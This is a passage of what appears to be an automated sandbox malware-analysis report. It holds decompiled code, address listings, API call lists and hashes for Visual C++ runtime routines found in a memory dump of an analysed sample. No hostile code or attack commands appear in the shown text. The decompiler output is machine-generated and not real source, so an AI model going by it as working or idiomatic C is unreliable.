                                                          				goto L17;
                                                          			}


























                                                          0x00407844
                                                          0x00407844
                                                          0x00407844
                                                          0x00407846
                                                          0x0040784b
                                                          0x00407852
                                                          0x00407859
                                                          0x0040785f
                                                          0x00407866
                                                          0x0040786a
                                                          0x0040786b
                                                          0x0040786c
                                                          0x00407875
                                                          0x00407a7b
                                                          0x00407a7b
                                                          0x00407a7b
                                                          0x00407a7e
                                                          0x00407a83
                                                          0x00407a83
                                                          0x0040787b
                                                          0x00407880
                                                          0x00407886
                                                          0x00407886
                                                          0x004078b7
                                                          0x0040788e
                                                          0x00407892
                                                          0x00407895
                                                          0x00407899
                                                          0x0040789c
                                                          0x004078a0
                                                          0x004078a4
                                                          0x004078a8
                                                          0x004078b1
                                                          0x004078b1
                                                          0x004078b1
                                                          0x004078bf
                                                          0x004079c2
                                                          0x004079c2
                                                          0x004079c4
                                                          0x004079c9
                                                          0x004079cf
                                                          0x004079d4
                                                          0x004079e1
                                                          0x004079e5
                                                          0x004079e7
                                                          0x004079f3
                                                          0x004079f5
                                                          0x004079f5
                                                          0x004079e9
                                                          0x004079eb
                                                          0x004079eb
                                                          0x004079ff
                                                          0x00407a01
                                                          0x00407a04
                                                          0x00407a49
                                                          0x00407a49
                                                          0x00407a49
                                                          0x00407a49
                                                          0x00407a4d
                                                          0x00000000
                                                          0x00407a06
                                                          0x00407a06
                                                          0x00407a08
                                                          0x00000000
                                                          0x00000000
                                                          0x00407a0b
                                                          0x00407a11
                                                          0x00407a13
                                                          0x00000000
                                                          0x00000000
                                                          0x00407a15
                                                          0x00407a17
                                                          0x00407a1c
                                                          0x00407a1f
                                                          0x00407a27
                                                          0x00407a2a
                                                          0x00407a2c
                                                          0x00407a2c
                                                          0x00407a2c
                                                          0x00407a2c
                                                          0x00407a21
                                                          0x00407a21
                                                          0x00407a21
                                                          0x00407a30
                                                          0x00407a35
                                                          0x00407a39
                                                          0x00407a40
                                                          0x00407a42
                                                          0x00000000
                                                          0x00407a44
                                                          0x00407a44
                                                          0x00000000
                                                          0x00407a44
                                                          0x00407a42
                                                          0x004079db
                                                          0x004079db
                                                          0x004079db
                                                          0x00407a53
                                                          0x00407a53
                                                          0x00407a54
                                                          0x00407a63
                                                          0x00407a69
                                                          0x00000000
                                                          0x00407a69
                                                          0x004078c5
                                                          0x004078ca
                                                          0x00000000
                                                          0x00000000
                                                          0x004078d0
                                                          0x004078d2
                                                          0x004078d8
                                                          0x004078e2
                                                          0x004078e4
                                                          0x004078e4
                                                          0x004078e8
                                                          0x0040793d
                                                          0x004078ef
                                                          0x004078f6
                                                          0x004078f8
                                                          0x00407947
                                                          0x0040794d
                                                          0x0040794d
                                                          0x00407953
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407955
                                                          0x00407955
                                                          0x00407958
                                                          0x0040795d
                                                          0x00407964
                                                          0x00407968
                                                          0x00000000
                                                          0x00000000
                                                          0x0040796c
                                                          0x00407979
                                                          0x00407987
                                                          0x00407993
                                                          0x00407997
                                                          0x0040799a
                                                          0x0040799f
                                                          0x004079a3
                                                          0x004079ac
                                                          0x00000000
                                                          0x00000000
                                                          0x004079b2
                                                          0x00000000
                                                          0x004079b2
                                                          0x0040796f
                                                          0x00407975
                                                          0x00407977
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407977
                                                          0x004079b5
                                                          0x004079b5
                                                          0x004079b8
                                                          0x004079b9
                                                          0x004079bd
                                                          0x00000000
                                                          0x00407955
                                                          0x004078fa
                                                          0x00407901
                                                          0x00407903
                                                          0x0040790a
                                                          0x0040790a
                                                          0x00407938
                                                          0x00407938
                                                          0x0040793a
                                                          0x00000000
                                                          0x00000000
                                                          0x00407912
                                                          0x00407916
                                                          0x00407919
                                                          0x0040791d
                                                          0x00407921
                                                          0x00407925
                                                          0x00407929
                                                          0x0040792d
                                                          0x00407932
                                                          0x00407932
                                                          0x00407932
                                                          0x0040793c
                                                          0x0040793c
                                                          0x0040793c
                                                          0x00000000

                                                          APIs
                                                          • GetStartupInfoA.KERNEL32(?), ref: 00407859
                                                          • __calloc_crt.LIBCMT ref: 0040786C
                                                            • Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
                                                            • Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC
                                                          • __calloc_crt.LIBCMT ref: 004078EF
                                                          • GetFileType.KERNEL32(00000038), ref: 0040796F
                                                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 004079A3
                                                          • GetStdHandle.KERNEL32(-000000F6), ref: 004079F9
                                                          • GetFileType.KERNEL32(00000000), ref: 00407A0B
                                                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00407A39
                                                          • SetHandleCount.KERNEL32 ref: 00407A63
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                                                          • String ID:
                                                          • API String ID: 1318386821-0
                                                          • Opcode ID: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
                                                          • Instruction ID: 69dbfb245cb0b330f8ea7ce656b2dbe2117018d0c8ec9728b90aae803ce677d5
                                                          • Opcode Fuzzy Hash: c3d4f8456791a988d50b6682e00ba2af4a87bac8f78f88e13e203df50547b23e
                                                          • Instruction Fuzzy Hash: 24610AB1E4C7418ED7108B78C844B567BA0AF52334F29837AD4A5BB2E1D73CB845CB1A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E00405CC9(void* __ecx, void* __edx, void* __eflags, void* __fp0, int _a4, int _a8) {
                                                          				signed int _v8;
                                                          				char _v21;
                                                          				char _v22;
                                                          				struct _cpinfo _v28;
                                                          				signed int _v32;
                                                          				int _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t53;
                                                          				int _t56;
                                                          				signed char _t59;
                                                          				int _t61;
                                                          				short* _t62;
                                                          				signed int _t67;
                                                          				signed char* _t77;
                                                          				signed int _t80;
                                                          				int _t81;
                                                          				signed int _t84;
                                                          				intOrPtr* _t85;
                                                          				int _t89;
                                                          				signed char _t90;
                                                          				signed int _t91;
                                                          				int _t93;
                                                          				int _t95;
                                                          				signed int _t96;
                                                          				signed int _t99;
                                                          				intOrPtr* _t103;
                                                          				signed int _t105;
                                                          				void* _t112;
                                                          
                                                          				_t112 = __fp0;
                                                          				_t53 =  *0x413004; // 0xf284055d
                                                          				_v8 = _t53 ^ _t105;
                                                          				_t81 = _a8;
                                                          				_t95 = E00405C4F(_a4);
                                                          				_t98 = 0;
                                                          				_t110 = _t95;
                                                          				_a4 = _t95;
                                                          				if(_t95 != 0) {
                                                          					_v32 = 0;
                                                          					_t56 = 0;
                                                          					__eflags = 0;
                                                          					while(1) {
                                                          						__eflags =  *((intOrPtr*)(_t56 + 0x4136d8)) - _t95;
                                                          						if( *((intOrPtr*)(_t56 + 0x4136d8)) == _t95) {
                                                          							break;
                                                          						}
                                                          						_v32 = _v32 + 1;
                                                          						_t56 = _t56 + 0x30;
                                                          						__eflags = _t56 - 0xf0;
                                                          						if(_t56 < 0xf0) {
                                                          							continue;
                                                          						} else {
                                                          							__eflags = _t95 - 0xfde8;
                                                          							if(_t95 == 0xfde8) {
                                                          								L35:
                                                          								_t65 = _t56 | 0xffffffff;
                                                          								__eflags = _t56 | 0xffffffff;
                                                          							} else {
                                                          								__eflags = _t95 - 0xfde9;
                                                          								if(_t95 == 0xfde9) {
                                                          									goto L35;
                                                          								} else {
                                                          									_t56 = IsValidCodePage(_t95 & 0x0000ffff);
                                                          									__eflags = _t56;
                                                          									if(_t56 == 0) {
                                                          										goto L35;
                                                          									} else {
                                                          										_t56 = GetCPInfo(_t95,  &_v28);
                                                          										__eflags = _t56;
                                                          										if(_t56 == 0) {
                                                          											__eflags =  *0x4144b0 - _t98;
                                                          											if(__eflags != 0) {
                                                          												goto L1;
                                                          											} else {
                                                          												goto L35;
                                                          											}
                                                          										} else {
                                                          											E00409280(_t95, _t81 + 0x1c, _t98, 0x101);
                                                          											_t93 = 1;
                                                          											__eflags = _v28 - 1;
                                                          											 *(_t81 + 4) = _t95;
                                                          											 *(_t81 + 0xc) = _t98;
                                                          											if(_v28 <= 1) {
                                                          												 *(_t81 + 8) = _t98;
                                                          											} else {
                                                          												__eflags = _v22;
                                                          												if(_v22 != 0) {
                                                          													_t103 =  &_v21;
                                                          													while(1) {
                                                          														_t90 =  *_t103;
                                                          														__eflags = _t90;
                                                          														if(_t90 == 0) {
                                                          															goto L29;
                                                          														}
                                                          														_t80 =  *(_t103 - 1) & 0x000000ff;
                                                          														_t91 = _t90 & 0x000000ff;
                                                          														while(1) {
                                                          															__eflags = _t80 - _t91;
                                                          															if(_t80 > _t91) {
                                                          																break;
                                                          															}
                                                          															 *(_t81 + _t80 + 0x1d) =  *(_t81 + _t80 + 0x1d) | 0x00000004;
                                                          															_t80 = _t80 + 1;
                                                          															__eflags = _t80;
                                                          														}
                                                          														_t103 = _t103 + 2;
                                                          														__eflags =  *(_t103 - 1);
                                                          														if( *(_t103 - 1) != 0) {
                                                          															continue;
                                                          														}
                                                          														goto L29;
                                                          													}
                                                          												}
                                                          												L29:
                                                          												_t77 = _t81 + 0x1e;
                                                          												_t89 = 0xfe;
                                                          												do {
                                                          													 *_t77 =  *_t77 | 0x00000008;
                                                          													_t77 =  &(_t77[1]);
                                                          													_t89 = _t89 - 1;
                                                          													__eflags = _t89;
                                                          												} while (_t89 != 0);
                                                          												 *(_t81 + 0xc) = E0040599D( *(_t81 + 4));
                                                          												 *(_t81 + 8) = _t93;
                                                          											}
                                                          											_t95 = _t81 + 0x10;
                                                          											asm("stosd");
                                                          											asm("stosd");
                                                          											asm("stosd");
                                                          											L25:
                                                          											_t98 = _t81;
                                                          											E00405A21(_t81, _t112);
                                                          											goto L2;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L36;
                                                          					}
                                                          					E00409280(_t95, _t81 + 0x1c, _t98, 0x101);
                                                          					_t84 = _v32 * 0x30;
                                                          					_v36 = _t98;
                                                          					_t99 = _t84 + 0x4136e8;
                                                          					_v32 = _t99;
                                                          					while(1) {
                                                          						L21:
                                                          						__eflags =  *_t99;
                                                          						if( *_t99 == 0) {
                                                          							break;
                                                          						}
                                                          						_t59 =  *(_t99 + 1);
                                                          						__eflags = _t59;
                                                          						if(_t59 != 0) {
                                                          							_t96 =  *_t99 & 0x000000ff;
                                                          							_t67 = _t59 & 0x000000ff;
                                                          							while(1) {
                                                          								__eflags = _t96 - _t67;
                                                          								if(_t96 > _t67) {
                                                          									break;
                                                          								}
                                                          								 *(_t81 + _t96 + 0x1d) =  *(_t81 + _t96 + 0x1d) |  *(_v36 + 0x4136d4);
                                                          								_t67 =  *(_t99 + 1) & 0x000000ff;
                                                          								_t96 = _t96 + 1;
                                                          								__eflags = _t96;
                                                          							}
                                                          							_t95 = _a4;
                                                          							_t99 = _t99 + 2;
                                                          							__eflags = _t99;
                                                          							continue;
                                                          						}
                                                          						break;
                                                          					}
                                                          					_v36 = _v36 + 1;
                                                          					_t99 = _v32 + 8;
                                                          					__eflags = _v36 - 4;
                                                          					_v32 = _t99;
                                                          					if(_v36 < 4) {
                                                          						goto L21;
                                                          					}
                                                          					 *(_t81 + 4) = _t95;
                                                          					 *(_t81 + 8) = 1;
                                                          					_t61 = E0040599D(_t95);
                                                          					 *(_t81 + 0xc) = _t61;
                                                          					_t62 = _t81 + 0x10;
                                                          					_t85 = _t84 + 0x4136dc;
                                                          					_t93 = 6;
                                                          					do {
                                                          						 *_t62 =  *_t85;
                                                          						_t85 = _t85 + 2;
                                                          						_t62 = _t62 + 2;
                                                          						_t93 = _t93 - 1;
                                                          						__eflags = _t93;
                                                          					} while (_t93 != 0);
                                                          					goto L25;
                                                          				} else {
                                                          					L1:
                                                          					E004059CC(_t81, _t110);
                                                          					L2:
                                                          					_t65 = 0;
                                                          				}
                                                          				L36:
                                                          				return E0040318A(_t65, _t81, _v8 ^ _t105, _t93, _t95, _t98);
                                                          			}


































                                                          0x00405cc9
                                                          0x00405ccf
                                                          0x00405cd6
                                                          0x00405cda
                                                          0x00405ce7
                                                          0x00405ce9
                                                          0x00405ceb
                                                          0x00405ced
                                                          0x00405cf0
                                                          0x00405d00
                                                          0x00405d03
                                                          0x00405d03
                                                          0x00405d05
                                                          0x00405d05
                                                          0x00405d0b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405d11
                                                          0x00405d14
                                                          0x00405d17
                                                          0x00405d1c
                                                          0x00000000
                                                          0x00405d1e
                                                          0x00405d1e
                                                          0x00405d24
                                                          0x00405e90
                                                          0x00405e90
                                                          0x00405e90
                                                          0x00405d2a
                                                          0x00405d2a
                                                          0x00405d30
                                                          0x00000000
                                                          0x00405d36
                                                          0x00405d3a
                                                          0x00405d40
                                                          0x00405d42
                                                          0x00000000
                                                          0x00405d48
                                                          0x00405d4d
                                                          0x00405d53
                                                          0x00405d55
                                                          0x00405e84
                                                          0x00405e8a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405d5b
                                                          0x00405d65
                                                          0x00405d6c
                                                          0x00405d70
                                                          0x00405d73
                                                          0x00405d76
                                                          0x00405d79
                                                          0x00405e77
                                                          0x00405d7f
                                                          0x00405d7f
                                                          0x00405d83
                                                          0x00405d89
                                                          0x00405d8c
                                                          0x00405d8c
                                                          0x00405d8e
                                                          0x00405d90
                                                          0x00000000
                                                          0x00000000
                                                          0x00405d96
                                                          0x00405d9a
                                                          0x00405e48
                                                          0x00405e48
                                                          0x00405e4a
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e42
                                                          0x00405e47
                                                          0x00405e47
                                                          0x00405e47
                                                          0x00405e4d
                                                          0x00405e4e
                                                          0x00405e52
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e52
                                                          0x00405d8c
                                                          0x00405e58
                                                          0x00405e58
                                                          0x00405e5b
                                                          0x00405e60
                                                          0x00405e60
                                                          0x00405e63
                                                          0x00405e64
                                                          0x00405e64
                                                          0x00405e64
                                                          0x00405e6f
                                                          0x00405e72
                                                          0x00405e72
                                                          0x00405e7c
                                                          0x00405e7f
                                                          0x00405e80
                                                          0x00405e81
                                                          0x00405e36
                                                          0x00405e36
                                                          0x00405e38
                                                          0x00000000
                                                          0x00405e38
                                                          0x00405d55
                                                          0x00405d42
                                                          0x00405d30
                                                          0x00405d24
                                                          0x00000000
                                                          0x00405d1c
                                                          0x00405dac
                                                          0x00405db7
                                                          0x00405dba
                                                          0x00405dbd
                                                          0x00405dc3
                                                          0x00405df2
                                                          0x00405df2
                                                          0x00405df2
                                                          0x00405df5
                                                          0x00000000
                                                          0x00000000
                                                          0x00405dc8
                                                          0x00405dcb
                                                          0x00405dcd
                                                          0x00405dcf
                                                          0x00405dd2
                                                          0x00405de9
                                                          0x00405de9
                                                          0x00405deb
                                                          0x00000000
                                                          0x00000000
                                                          0x00405de0
                                                          0x00405de4
                                                          0x00405de8
                                                          0x00405de8
                                                          0x00405de8
                                                          0x00405ded
                                                          0x00405df1
                                                          0x00405df1
                                                          0x00000000
                                                          0x00405df1
                                                          0x00000000
                                                          0x00405dcd
                                                          0x00405dfa
                                                          0x00405dfd
                                                          0x00405e00
                                                          0x00405e04
                                                          0x00405e07
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e0b
                                                          0x00405e0e
                                                          0x00405e15
                                                          0x00405e1c
                                                          0x00405e1f
                                                          0x00405e22
                                                          0x00405e28
                                                          0x00405e29
                                                          0x00405e2d
                                                          0x00405e30
                                                          0x00405e32
                                                          0x00405e33
                                                          0x00405e33
                                                          0x00405e33
                                                          0x00000000
                                                          0x00405cf2
                                                          0x00405cf2
                                                          0x00405cf4
                                                          0x00405cf9
                                                          0x00405cf9
                                                          0x00405cf9
                                                          0x00405e93
                                                          0x00405ea1

                                                          APIs
                                                          • getSystemCP.LIBCMT ref: 00405CE2
                                                            • Part of subcall function 00405C4F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405C5C
                                                            • Part of subcall function 00405C4F: GetOEMCP.KERNEL32(00000000), ref: 00405C76
                                                          • setSBCS.LIBCMT ref: 00405CF4
                                                            • Part of subcall function 004059CC: _memset.LIBCMT ref: 004059DF
                                                          • IsValidCodePage.KERNEL32(-00000030), ref: 00405D3A
                                                          • GetCPInfo.KERNEL32(00000000,?), ref: 00405D4D
                                                          • _memset.LIBCMT ref: 00405D65
                                                          • setSBUpLow.LIBCMT ref: 00405E38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                          • String ID:
                                                          • API String ID: 2658552758-0
                                                          • Opcode ID: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
                                                          • Instruction ID: d2136bea0d1a2f065ec75707fb5b56249d955542dcdf0261cb1fe3d024273208
                                                          • Opcode Fuzzy Hash: ec85c08ce6dd7219b9a68a7b6597c8f394aac1bdbade679ca7a276b608924005
                                                          • Instruction Fuzzy Hash: BC5100719046549BDB258F65C8846BFBBB5EF04304F14847BD886BF282C63C8A42CFD8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E00406443(intOrPtr _a4) {
                                                          				intOrPtr _v0;
                                                          				struct HINSTANCE__* _t8;
                                                          				_Unknown_base(*)()* _t9;
                                                          				intOrPtr _t11;
                                                          				void* _t13;
                                                          				struct HINSTANCE__* _t15;
                                                          				void* _t20;
                                                          
                                                          				if(TlsGetValue( *0x4138c4) == 0) {
                                                          					L4:
                                                          					_t15 = GetModuleHandleA("KERNEL32.DLL");
                                                          					__eflags = _t15;
                                                          					if(__eflags == 0) {
                                                          						L9:
                                                          						return _a4;
                                                          					}
                                                          					_t8 = E00406360(__eflags, _t20);
                                                          					__eflags = _t8;
                                                          					if(_t8 == 0) {
                                                          						goto L9;
                                                          					}
                                                          					_t9 = GetProcAddress(_t15, "DecodePointer");
                                                          					L7:
                                                          					if(_t9 != 0) {
                                                          						_v0 =  *_t9(_a4);
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t11 =  *0x4138c0; // 0xffffffff
                                                          				if(_t11 == 0xffffffff) {
                                                          					goto L4;
                                                          				}
                                                          				_push(_t11);
                                                          				_t13 =  *(TlsGetValue( *0x4138c4))();
                                                          				if(_t13 == 0) {
                                                          					goto L4;
                                                          				}
                                                          				_t9 =  *(_t13 + 0x1fc);
                                                          				goto L7;
                                                          			}










                                                          0x00406454
                                                          0x00406477
                                                          0x00406482
                                                          0x00406484
                                                          0x00406486
                                                          0x004064ab
                                                          0x004064b0
                                                          0x004064b0
                                                          0x00406488
                                                          0x0040648d
                                                          0x0040648f
                                                          0x00000000
                                                          0x00000000
                                                          0x00406497
                                                          0x0040649d
                                                          0x0040649f
                                                          0x004064a7
                                                          0x004064a7
                                                          0x00000000
                                                          0x0040649f
                                                          0x00406456
                                                          0x0040645e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406460
                                                          0x00406469
                                                          0x0040646d
                                                          0x00000000
                                                          0x00000000
                                                          0x0040646f
                                                          0x00000000

                                                          APIs
                                                          • TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                                          • TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040647C
                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00406497
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Value$AddressHandleModuleProc
                                                          • String ID: DecodePointer$KERNEL32.DLL
                                                          • API String ID: 1929421221-629428536
                                                          • Opcode ID: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
                                                          • Instruction ID: c5ae10eeeadb9dadabf971efa998db1139b8a5cf31b1e54eaa7b2be9f0bd982d
                                                          • Opcode Fuzzy Hash: b690ae7a4bf386a7f8bd60c127f260c88c3a5c47ce0539964af77006a0b3269b
                                                          • Instruction Fuzzy Hash: 25F03670900612ABC611EB78ED04DAB3BE4AF017A07168572FC45F72F0DB38DD658AAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E004063CC(intOrPtr _a4) {
                                                          				intOrPtr _v0;
                                                          				struct HINSTANCE__* _t8;
                                                          				_Unknown_base(*)()* _t9;
                                                          				intOrPtr _t11;
                                                          				void* _t13;
                                                          				struct HINSTANCE__* _t15;
                                                          				void* _t20;
                                                          
                                                          				if(TlsGetValue( *0x4138c4) == 0) {
                                                          					L4:
                                                          					_t15 = GetModuleHandleA("KERNEL32.DLL");
                                                          					__eflags = _t15;
                                                          					if(__eflags == 0) {
                                                          						L9:
                                                          						return _a4;
                                                          					}
                                                          					_t8 = E00406360(__eflags, _t20);
                                                          					__eflags = _t8;
                                                          					if(_t8 == 0) {
                                                          						goto L9;
                                                          					}
                                                          					_t9 = GetProcAddress(_t15, "EncodePointer");
                                                          					L7:
                                                          					if(_t9 != 0) {
                                                          						_v0 =  *_t9(_a4);
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t11 =  *0x4138c0; // 0xffffffff
                                                          				if(_t11 == 0xffffffff) {
                                                          					goto L4;
                                                          				}
                                                          				_push(_t11);
                                                          				_t13 =  *(TlsGetValue( *0x4138c4))();
                                                          				if(_t13 == 0) {
                                                          					goto L4;
                                                          				}
                                                          				_t9 =  *(_t13 + 0x1f8);
                                                          				goto L7;
                                                          			}










                                                          0x004063dd
                                                          0x00406400
                                                          0x0040640b
                                                          0x0040640d
                                                          0x0040640f
                                                          0x00406434
                                                          0x00406439
                                                          0x00406439
                                                          0x00406411
                                                          0x00406416
                                                          0x00406418
                                                          0x00000000
                                                          0x00000000
                                                          0x00406420
                                                          0x00406426
                                                          0x00406428
                                                          0x00406430
                                                          0x00406430
                                                          0x00000000
                                                          0x00406428
                                                          0x004063df
                                                          0x004063e7
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e9
                                                          0x004063f2
                                                          0x004063f6
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f8
                                                          0x00000000

                                                          APIs
                                                          • TlsGetValue.KERNEL32(00000000,00406441,00000000,0040AF2E,00000000,00000000,00000314,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063D9
                                                          • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 004063F0
                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00414548,00406E47,00414548,Microsoft Visual C++ Runtime Library,00012010), ref: 00406405
                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00406420
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Value$AddressHandleModuleProc
                                                          • String ID: EncodePointer$KERNEL32.DLL
                                                          • API String ID: 1929421221-3682587211
                                                          • Opcode ID: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
                                                          • Instruction ID: cf491b8ffedcf847512659abc69032a8f38a6fac2648f49244538ea113319bae
                                                          • Opcode Fuzzy Hash: 88cf95aeb8d75637f3377e4c34be696f5c1dcc6d34e432568b273bc1bd6ebf91
                                                          • Instruction Fuzzy Hash: D9F0BB30901122ABD7116B6CDD00ADB3BD49F007547168072FC05F32F1DB38CC568AAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040906B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				signed int _v12;
                                                          				char _v20;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t54;
                                                          				intOrPtr _t56;
                                                          				int _t57;
                                                          				signed short* _t58;
                                                          				short* _t59;
                                                          				int _t64;
                                                          				void* _t70;
                                                          				char* _t71;
                                                          
                                                          				_t70 = __edi;
                                                          				_t71 = _a8;
                                                          				if(_t71 == 0 || _a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					if( *_t71 != 0) {
                                                          						E004032D9( &_v20, _a16);
                                                          						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                                                          							if(E00409195( *_t71 & 0x000000ff,  &_v20) == 0) {
                                                          								_t40 = _v20 + 4; // 0x840ffff8
                                                          								if(MultiByteToWideChar( *_t40, 9, _t71, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                                                          									L10:
                                                          									if(_v8 != 0) {
                                                          										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                          									}
                                                          									return 1;
                                                          								}
                                                          								L21:
                                                          								_t54 = L00403CE9(_t50, 0, _t70, _t71);
                                                          								 *_t54 = 0x2a;
                                                          								if(_v8 != 0) {
                                                          									_t54 = _v12;
                                                          									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                                                          								}
                                                          								return _t54 | 0xffffffff;
                                                          							}
                                                          							_t50 = _v20;
                                                          							_t15 = _t50 + 0xac; // 0xa045ff98
                                                          							_t64 =  *_t15;
                                                          							if(_t64 <= 1 || _a12 < _t64) {
                                                          								L17:
                                                          								_t24 = _t50 + 0xac; // 0xa045ff98
                                                          								if(_a12 <  *_t24 || _t71[1] == 0) {
                                                          									goto L21;
                                                          								} else {
                                                          									goto L19;
                                                          								}
                                                          							} else {
                                                          								_t21 = _t50 + 4; // 0x840ffff8
                                                          								_t57 = MultiByteToWideChar( *_t21, 9, _t71, _t64, _a4, 0 | _a4 != 0x00000000);
                                                          								_t50 = _v20;
                                                          								if(_t57 != 0) {
                                                          									L19:
                                                          									_t27 = _t50 + 0xac; // 0xa045ff98
                                                          									_t56 =  *_t27;
                                                          									if(_v8 == 0) {
                                                          										return _t56;
                                                          									}
                                                          									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                          									return _t56;
                                                          								}
                                                          								goto L17;
                                                          							}
                                                          						}
                                                          						_t58 = _a4;
                                                          						if(_t58 != 0) {
                                                          							 *_t58 =  *_t71 & 0x000000ff;
                                                          						}
                                                          						goto L10;
                                                          					} else {
                                                          						_t59 = _a4;
                                                          						if(_t59 != 0) {
                                                          							 *_t59 = 0;
                                                          						}
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          			}

















                                                          0x0040906b
                                                          0x00409073
                                                          0x0040907a
                                                          0x0040908f
                                                          0x00000000
                                                          0x00409081
                                                          0x00409083
                                                          0x0040909b
                                                          0x004090a6
                                                          0x004090d8
                                                          0x0040916b
                                                          0x00409176
                                                          0x004090b6
                                                          0x004090b9
                                                          0x004090be
                                                          0x004090be
                                                          0x00000000
                                                          0x004090c4
                                                          0x00409138
                                                          0x00409138
                                                          0x0040913d
                                                          0x00409146
                                                          0x00409148
                                                          0x0040914b
                                                          0x0040914b
                                                          0x00000000
                                                          0x0040914f
                                                          0x004090da
                                                          0x004090dd
                                                          0x004090dd
                                                          0x004090e6
                                                          0x0040910d
                                                          0x00409110
                                                          0x00409116
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004090ed
                                                          0x004090fd
                                                          0x00409100
                                                          0x00409108
                                                          0x0040910b
                                                          0x0040911d
                                                          0x00409120
                                                          0x00409120
                                                          0x00409126
                                                          0x00409094
                                                          0x00409094
                                                          0x0040912f
                                                          0x00000000
                                                          0x0040912f
                                                          0x00000000
                                                          0x0040910b
                                                          0x004090e6
                                                          0x004090a8
                                                          0x004090ad
                                                          0x004090b3
                                                          0x004090b3
                                                          0x00000000
                                                          0x00409085
                                                          0x00409085
                                                          0x0040908a
                                                          0x0040908c
                                                          0x0040908c
                                                          0x00000000
                                                          0x0040908a
                                                          0x00409083

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040909B
                                                          • __isleadbyte_l.LIBCMT ref: 004090CF
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,00408678,?,?,00000002), ref: 00409100
                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00408678,?,?,00000002), ref: 0040916E
                                                          Strings
                                                          Memory Dump Source
